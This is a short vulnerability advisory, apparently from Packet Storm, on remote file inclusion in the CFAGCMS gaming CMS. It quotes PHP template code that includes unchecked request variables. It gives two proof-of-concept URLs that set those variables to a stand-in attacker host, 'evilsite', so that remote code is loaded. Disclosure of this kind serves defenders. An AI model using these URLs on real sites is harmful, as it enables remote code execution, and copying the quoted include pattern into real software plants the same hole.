CFAGCMS suffers from a remote file inclusion vulnerability.
af870e09e20f35b4563b1b224723b361683cbb8057a52946f0a1fe2c5b8ef096########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: CFAGCMS Remote File Inclusion
# Vendor: http://sourceforge.net/projects/cfagcms/
# Bug: Remote File Inclusion
# Vulnerable Version: 1
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_58.htm
###################################################################
####################
- Description:
####################
CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and
others. It's using php and mysql.
####################
- Vulnerability:
####################
+--> File Inclusion
When register_globals is enabled, Its possible to include arbitrary
files from local or remote resources.
####################
- Code Snippet:
####################
themes/default/index.php #line:14-17
<div id="twocols" class="clearfix">
<div id="maincol" >maincol<?php include($main);?></div>
<div id="rightcol" >right col<?php include($right);?></div>
</div>
####################
- Exploits/POCs:
####################
POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite
POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed